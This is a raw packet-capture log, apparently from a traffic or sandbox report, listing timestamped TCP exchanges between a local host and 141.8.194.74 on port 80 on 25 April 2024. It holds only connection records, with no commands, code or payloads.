                                                Apr 25, 2024 10:18:52.395179987 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395186901 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395205975 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395224094 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395246983 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395263910 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395282984 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395302057 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395330906 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.401954889 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.464848042 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.705156088 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.705287933 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.705931902 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946023941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946502924 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946567059 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946607113 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946629047 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946685076 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946722984 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946758986 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946760893 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946799994 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946846008 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946901083 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946943045 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946980000 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946990013 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.947032928 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.186929941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.186975002 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187035084 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187072992 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187088013 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187112093 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187139988 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187153101 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187190056 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187203884 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187247038 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187284946 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187294960 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187323093 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187381029 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187429905 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187433958 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187474012 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187490940 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187513113 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187551975 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187578917 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187589884 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187630892 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187664032 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187665939 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187722921 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187733889 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187761068 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187879086 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.427927017 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428004980 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428047895 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428086042 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428138018 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428167105 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428180933 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428236008 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428272963 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428307056 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428309917 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428350925 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428368092 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428391933 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428430080 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428443909 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428467989 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428504944 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428543091 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428546906 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428581953 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428596020 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.430819988 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671466112 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671557903 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671597004 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671633005 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671657085 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671713114 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671717882 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671751976 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671788931 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671839952 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671875000 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671911955 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671932936 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671948910 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671987057 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672039986 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672060013 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672135115 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672158003 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672173977 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672213078 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672251940 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672286987 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672287941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672310114 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672374964 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672411919 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672432899 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672483921 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672525883 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672561884 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672569036 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672605038 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672642946 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672672033 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672683001 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672693968 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672755957 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672794104 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672811031 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672899008 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672940016 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672977924 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672996998 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673036098 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673051119 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673089981 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673125982 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673166037 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673198938 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673270941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673270941 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673341990 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673378944 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673434019 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673451900 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673491001 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673505068 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673530102 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673567057 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673580885 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673604012 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673641920 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673681974 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673681974 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673743010 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.911957979 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.914110899 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.134438992 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.391176939 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.391263008 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.394668102 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651034117 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651479006 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651523113 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651561975 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651588917 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651599884 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651638985 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651657104 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651698112 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651735067 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651742935 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651772976 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651810884 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651810884 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651849031 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651892900 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908201933 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908277988 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908334970 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908344984 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908375025 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908411980 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908421040 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908453941 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908492088 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908515930 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908530951 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908567905 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908606052 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908612013 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908643961 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908674955 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908682108 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908720970 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908746958 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908759117 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908802986 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908813000 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908849001 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908885956 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908921957 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908922911 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908960104 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.908992052 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908998013 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.909039974 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.165365934 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165417910 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165457964 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165496111 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165523052 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.165534019 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165571928 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165611029 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165617943 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.165617943 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.165651083 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165687084 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165724039 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165729046 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.165760994 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165796995 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165807962 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.165833950 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165889025 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165894985 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.165930986 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.165931940 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.175580978 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.432456970 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432509899 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432548046 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432568073 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.432585955 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432622910 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432651997 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.432667017 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432704926 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432708025 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.432742119 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432797909 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432835102 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432838917 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.432872057 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432909012 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432912111 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.432946920 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.432951927 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.432984114 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433022976 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433023930 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433058977 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433095932 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433114052 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433151960 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433190107 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433226109 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433226109 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433281898 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433320045 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433324099 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433357954 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433363914 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433396101 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433434010 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433434963 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433475018 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433511972 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433549881 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433557034 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433589935 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433589935 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433629036 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433666945 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433705091 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433711052 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433743954 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433782101 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433785915 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433819056 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433825970 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433856964 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433893919 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433918953 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.433931112 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.433969975 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.434006929 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.434007883 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.434043884 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.434055090 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.434081078 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.434118032 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.434118986 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.434154987 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.434191942 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:53.434237003 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:53.436507940 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:14.806086063 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.065556049 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.065675020 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.066021919 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.324222088 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326227903 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326374054 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326416016 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326431036 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.326456070 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326493979 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326514006 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.326531887 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326570034 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326611042 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326613903 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.326649904 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326688051 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.326694965 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.326740026 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.584947109 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585092068 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585130930 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585167885 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585170031 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585241079 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585242033 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585279942 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585318089 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585354090 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585357904 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585396051 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585417032 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585433960 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585474014 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585506916 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585511923 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585550070 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585567951 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585587978 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585633993 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585671902 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585675955 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585709095 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585732937 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585798979 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585835934 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.585874081 CEST8049746141.8.194.74192.168.2.4
